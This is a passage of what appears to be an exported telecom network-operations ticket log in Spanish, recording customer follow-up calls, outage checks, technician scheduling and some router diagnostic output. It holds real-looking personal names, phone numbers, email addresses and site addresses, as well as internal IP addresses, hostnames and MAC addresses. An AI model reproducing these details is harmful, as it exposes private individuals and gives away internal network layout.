    <t>SE LLAMÓ A BILLY JUÁREZ/TÉCNICO 58263500 INDICA QUE VA CAMINO A CLIENTE, VA POR ZONA ROJA (PELIGROSA), LLAMARLE EN 35 MINUTOS. ADICIONAL SE LLAMÓ/HABLÓ CON SHERLY BARRERA/CLIENTE 54258062 Y SE LE BRINDAN AVANCES DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUANITA RAMIREZ 54149651  SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001331182 - 3001334705</t>
  </si>
  <si>
    <t>F4602493</t>
  </si>
  <si>
    <t>SE CONFIRMA CON GESTOR QUE PERSONAL TECNICO LLEGARA DESPUES DE LAS 18:00, SE VALIDA CON CLIENTE Y CONFIRMA QUE ESPERARAN A PERSONAL TECNICO HASTA QUE LLEGUE Y FINALICE LA REPARACION
-ID 300148694</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDA MONTANE PERO NO SE TIENE RESPUESTA SERVICIO ACTUALMENTE OPERATIVO A NIVEL WAN
3001461319
COLA:
NOMBRE: A: 50499244456
NÚMERO: 50499244456
DURACIÓN: 0:00:36
ESTADO: MARCANDO
DETALLES: 50499244456
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 15/06/2022 19:48:51</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CLAUDIA MONTOYA 99244456 MENCIONA QUE MAS DE LAS 18:40 NO PUEDE ESPERAR SE VALIDARA A CUANDO TIEMPO ESTA PERSONAL DE PR
-ID 3001437447</t>
  </si>
  <si>
    <t>F4602507</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JAIRO RAMOS 94529742 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001293545</t>
  </si>
  <si>
    <t>F4602514</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  JONATHA TANCHEZ AL 42116235 INDICA QUE DESDE AYER NO CUENTAN CON ENERGIA ELECTRICA EN SITIO QUE ES UN CORTE NO PROGRAMADO**
-ID 3001331536
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JONATHA TANCHEZ AL 42116235 SOLICITA QUE SE LE LLAME EN 10 MIN**
-ID 3001326634
**</t>
  </si>
  <si>
    <t>F4602516</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JOSE PEREZ 53344315 INFORMA QUE NO TIENEN ENERGIA EN SITIO DESDE LAS 8:00 AM **
-ID 3001317455
**</t>
  </si>
  <si>
    <t>F4602517</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  EVELYN SALAZAR PARA SOLICITARLE REALICE PRUEBAS PERO NO RESPONDE.
3001342155
COLA:
NOMBRE: A: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 12:18:27</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EVELYN  AL 0050376769577 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001425250
**</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE EVELYN PERO ENVIA A BUZON. SE LLAMARA ENSEGUIDA.
3001389270
COLA:
NOMBRE: A: 0050376769577
NÚMERO: 0050376769577
DURACIÓN: 0:00:08
ESTADO: MARCANDO
DETALLES: 0050376769577
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 14:40:06</t>
  </si>
  <si>
    <t>F4602525</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  SANDRA PORTILLO AL 77425503 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001364906
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SANDRA PORTILLO AL 77425503 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001329129
**</t>
  </si>
  <si>
    <t>F4602528</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE SR. JIMENEZ 55093630 QUIEN COMENTA QUE ESTÁN DANDO SEGUIMIENTO DE SU LADO CON SU PROVEEDOR DE LA PBX, SOLICITA SE LE LLAME A LAS 17:00 PARA VALIDAR. ID: 3001532948</t>
  </si>
  <si>
    <t>INFORMA CLIENTE SR. JIMENEZ 55093630 QUE EL PROBLEMA ES QUE NO PUEDEN HACER TRANSFERENCIA DE LLAMADAS HACIA MOVILES. INDICA QUE YA SE VERIFICÓ QUE EL INCONVENIENTE ES DE LA PLANTA PBX. CLIENTE ENLAZA A LA LLAMADA A NOE (PROVEEDOR) QUIEN COMENTA QUE ESTÁ HACIENDO PRUEBAS CON JOSUE CIAM. ID DE LLAMADA: 3001309953</t>
  </si>
  <si>
    <t>PROVEEDOR DEBE CAMBIAR EL CONTACT QUE ENVIA YA QUE ESTA ENVIANDO EL NUMERO DE ORIGEN DE LA LLAMADA EN EL MOMENTO DE HACER LA LLAMADA DEL DESVIO.  PROVEEDOR QUIERE QUE ESTE CAMBIO LO HAGA LA CENTRAL DE CLARO PERO NO SE PUEDE HACER ENMASCARIAMIENTO YA QUE ESTARIA AFECTADO TODOS LOS DEMAS CLIENTES. PROVEEDOR SEGUIRÁ TRABAJANDO EN EL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 58261437
NÚMERO: 58261437
INICIO: HOY, 17:07
FIN: HOY, 17:32
DURACIÓN: 24:29
ID DE LLAMADA: 3001435692</t>
  </si>
  <si>
    <t>F4602554</t>
  </si>
  <si>
    <t>CLIENTE GUSTAVO ADOLFO DE LEÓN COYOY INDICA QUE NOS PODRA APOYAR CON LAS PRUEBAS A LAS 15 HORAS.
3001339479
COLA:
NOMBRE: A: 56979595
NÚMERO: 56979595
DURACIÓN: 0:00:43
ESTADO: CONECTADA
DETALLES: 56979595
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 12:11:41
SE LE INFORMA A OSCAR SAMAYOA CX DEL HORARIO DE LAS PRUEBAS.
3001339833
COLA:
NOMBRE: A: 58261371
NÚMERO: 58261371
DURACIÓN: 0:00:49
ESTADO: CONECTADA
DETALLES: 58261371
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 15/06/2022 12:12:50</t>
  </si>
  <si>
    <t>F4602556</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RAMON AGUILAR 72214763 INDICA QUE SE LE LLAME DE 13:00 HRS EN ADELANTE YA QUE NO ESTA EN LA ALCALDIA **
-ID 3001334164 - 3001336806
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  RAMON AGUILAR 72214763 INDICA QUE YA REINICIO EL EQUIPO 2 VECES PERO NO LEVANTA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001380789
**</t>
  </si>
  <si>
    <t>F4602558</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO  TECU AL 49559968 SE BINDA RETROALIMENTACION A CLIENTE **
-ID 3001378630
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PABLO  TECU 49559968  PARA SOLICITAR DATOS DE VISITA
-ID 3001335862
NOMBRE DEL CLIENTE: TELEFACSIMIL S.A.
UBICACIÓN:18 CALLE 15-51,ZONA 13
CONTACTO EN SITIO: PABLO  TECU 49559968
HORARIO DE ATENCION:8:00 - 18:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4602571</t>
  </si>
  <si>
    <t>SE CONTACTA CON TEC MARLON PARA VALIDAR LOS AVANCES
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SEGUN PRUEBAS DE PARTE DEL CLIENTE INDICA QUE EL OP 108 SE ENCUENTRA ALARMADO ESTADO DE LAS LED, DESPUES DEL REINICIO?   3 LUCES ROJA CH2, 3,4 POWER EN COLOR VERDE.
SE CONTACTA CON CLIENTE CARLOS BENAVENTE / BLANCA FELIPE 49810203/ 51242086 QUIEN NOS INDICA QUE EL OP 108  NO SE ENCUENTRA ALARMADO LINK A Y LINK B SE ENCUENTRAN APAGADO, INDICA QUE REINICIARON LA PBX PERO EL SERVICIO NO LEVANTA, CLIENTE SOLICITA QUE SE ENVIE PERSONAL TECNCIO PARA LA REVISION DEL SERVICIO, NO ES NECESARIO TRAMITAR PERMISOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4602574</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN MORALES 41222979  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001361891</t>
  </si>
  <si>
    <t>F4602576</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 88548822 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 3001510071</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE, RESPONDE NIDIA, INDICA QUE SE LE LLAME AL  81186414, YA QUE SE ESCUCHA CON INTERFERENCIA
3001312771
COLA:
NOMBRE: A: 0050588548822
NÚMERO: 0050588548822
DURACIÓN: 0:01:52
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050588548822
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 15/06/2022 11:05:58</t>
  </si>
  <si>
    <t>CLIENTE NIDIA, APOYO REINICIANDO EL EQUIPO ETX1, CON ESTADO DE LUCES COMO SIGUE: PWR= ROJO,  NET 1 = APAGADO,  USER 3= VERDE, LUEGO DEL REINICIO QUEDAN EN EL MISMO ESTADO.  CONFIRMA DATOS PARA VISITA:
HORARIO 10:30 A 20:30 HORAS,
PERMISOS: IDENTIFICACION
CONTACTO EN SITIO: NIDIA 81186414
DIRECCION:  DIRECCION CONTIGUO A LA PLAZA LOS MANGO, KM 110.5 CARRETERA PANAMERICANA
3001314244
COLA:
NOMBRE: A: 0050581186414
NÚMERO: 0050581186414
DURACIÓN: 0:15:18
ESTADO: CONECTADA
DETALLES: 0050581186414
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 15/06/2022 11:22:50</t>
  </si>
  <si>
    <t>F4602581</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A LEONARDO DE LEON PERO NO SE TIENE RESPUESTA
3001804018
COLA:
NOMBRE: A: 40712802
NÚMERO: 40712802
DURACIÓN: 0:01:28
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 40712802
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 17/06/2022 13:50:15</t>
  </si>
  <si>
    <t>F4602588</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE  ROCIO RAMOS-35703273 COEMNTA QUE LA PBX ESTA TOTALMENTE APAGADA, Y HA VERIFICADO Y SI ESTA CONECTADA A LA ENERGIA... SE LE INDICA QUE SI ELLA TIENE PERMISO QUE APICQUE REINICIO A PBX- DEBIDO A QUE NOSOTROS OBSERVAMOS TODO OK POR PARTE NUESTRO, CLIENTE QUEDA ENTERADA +  INDICA QUE SE LE MARQUE EN 1 HORA
##VIVO</t>
  </si>
  <si>
    <t>F4602597</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ORLANDO HERRERA AL 78598805  NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001338346
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ORLANDO HERRERA AL 78598805 SOLICITA QUE SE LE LLAME EN 10 MIN PARA CONFIRMAR **
-ID 3001360751
**</t>
  </si>
  <si>
    <t>F4602611</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIME ARGUETA AL 78032835 NO CONTESTA || SE INTENTARA LUEGO PARA CONFIRMAR ACCESOS**
-ID 3001347554
**</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 15 DE JUNIO DE 2022 11:54
PARA: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; JARGUETA@DSASCORS.COM &lt;JARGUETA@DSASCORS.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE PERMISOS | ID1276020SV | ATILISA S.A. DE C.V.
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, SE HA GENERADO UNA VISITA TÉCNICA, POR LO QUE SE REQUIERE DE SU APOYO EN LA GESTIÓN Y AUTORIZACIÓN DE ACCESOS PARA EL PERSONAL QUE SE DESCRIBE A CONTINUACIÓN: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CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIME ARGUETA AL 78032835 EN EL PRIMER NUMERO NO RESPONDE Y EL SEGUNDO CONTESTA EL SEÑOR CARLOS INDICA QUE NOS ESTARA RESPONDIENDO POR CORREO EN UN MOMENTO **
-ID 3001369895 - 3001370112
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JAIME ARGUETA AL 78032835- 76818921 PRIMER NUMERO NO RESPONDE Y EL SEGUNDO CONTESTA EL SEÑOR CARLOS QUIEN INDICA QUE HOY ATIENDEN HASTA LAS 17:00 HRS QUE SE QUEDE LA VISITA PARA MAÑANA A LAS 8:00 YA PUEDEN ATENDER AL TECNICO**
-ID 3001411938 - 3001412200
**</t>
  </si>
  <si>
    <t>F4602633</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDUARDO CHACON AL 24232000 EXT 5010 CONFIRMA QUE POR EL MOMENTO ESTA ESTABLE SOLICITA QUE SE DEJE EN OBSERVACION PARA LAS 17:00 HRS **
-ID 3001339505
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDUARDO CHACON AL 24232000 EXT 5010 CONFIRMA SERVICIO ESTABLE Y
 AUTORIZA CIERRE DE TICKET **
-ID 3001432569
**</t>
  </si>
  <si>
    <t>F4602655</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DELIA CORRALES AL 8605-7930 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001494234
**</t>
  </si>
  <si>
    <t>F4602665</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL KAROLINE PALENCIA / ROSA DE ORDOÑES 30215843 / 56935515 ID: 3001337216 PARA REALIZAR PRUEBAS DE 1N, INDICA QUE SI PUEDE APOYAR A REALIZARLAS, SE CONTACTA A CNOC Y SE DEJA EN CONFERENCIA CLIENTE/GESTOR JOSE.ARIAS, SE CAMBIA F4602665 DE ESTADO*/*/*/</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KAROLINE PALENCIA 30215843 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001382843</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
PERO NO CONTESTAN.
3001380763
COLA:
NOMBRE: A: 25051919
NÚMERO: 25051919
DURACIÓN: 0:00:04
ESTADO: CONECTADA
DETALLES: 25051919
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 15/06/2022 14:13:27</t>
  </si>
  <si>
    <t>F4602668</t>
  </si>
  <si>
    <t>PLANTA INTERNA - CNOC NICARAGUA				
	WO OPEN                                			12:05
1/4	NACXHITL BERNARDINO PEREIRA 	87134513	3 HORAS	15:05:00
2/4	MARLON JAIME	88500414	4 HORAS	16:05:00
3/4	NORMAN SELVA                	88561050	5 HORAS	17:05:00
4/4	MARIO HURTADO	88538938	6 HORAS	18:05:00</t>
  </si>
  <si>
    <t>RP/0/RSP0/CPU0:LEO-CSC009010-M2#PING VR MPLS_SILAIS 10.29.27.152 COUNT 5000 SIZE 1500
WED JUN 15 12:53:36.289 NIC
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5000, 1500-BYTE ICMP ECHOS TO 10.29.27.152, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (5000/5000), ROUND-TRIP MIN/AVG/MAX = 1/1/14 MS
RP/0/RSP0/CPU0:LEO-CSC009010-M2#
12:54
ORALE
SI SE DEJA AMAR
AXEL, 12:54
SIMON, QUERES LA INFO DEL CPE?
12:54
PORFA
ASI LE DOY NUCA DE UNA
AXEL, 12:55
MINSA_ROSARIO_LACAYO_LEON#SHO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FASTETHERNET0                 0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET1              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET2              0         0         0         0         0         0         0         0         0
* GIGABITETHERNET3              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET4              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET5              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET6              0         0         0         0         0         0         0         0         0
  GIGABITETHERNET7              0         0         0         0         0         0         0         0         0
* GIGABITETHERNET8              0         0         0         0    140000         9    138000         6         0
* VLAN1                         0         0         0         0         0         0         0         0         0
* WLAN-GIGABITETHERNET8         0         0         0         0         0         0         0         0         0
* WLAN-AP0                      0         0         0         0         0         0         0         0         0
MINSA_ROSARIO_LACAYO_LEON#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.29.27.145            0   78BA.F975.9C15  ARPA   GIGABITETHERNET8
INTERNET  10.29.27.152            -   0042.68F5.50E6  ARPA   GIGABITETHERNET8
INTERNET  172.16.136.129          -   0042.68F5.50D4  ARPA   VLAN1
INTERNET  172.16.136.158          0   F439.093E.F69A  ARPA   VLAN1
MINSA_ROSARIO_LACAYO_LEON#SHO IP INT BRIEF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DOWN                  DOWN
GIGABITETHERNET2           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET3           UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET4           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET5           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET6           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET7           UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET8           10.29.27.152    YES NVRAM  UP                    UP
VLAN1                      172.16.136.129  YES NVRAM  UP                    UP
WLAN-GIGABITETHERNET8      UNASSIGNED      YES UNSET  UP                    UP
WLAN-AP0                   UNASSIGNED      YES NVRAM  UP                    UP
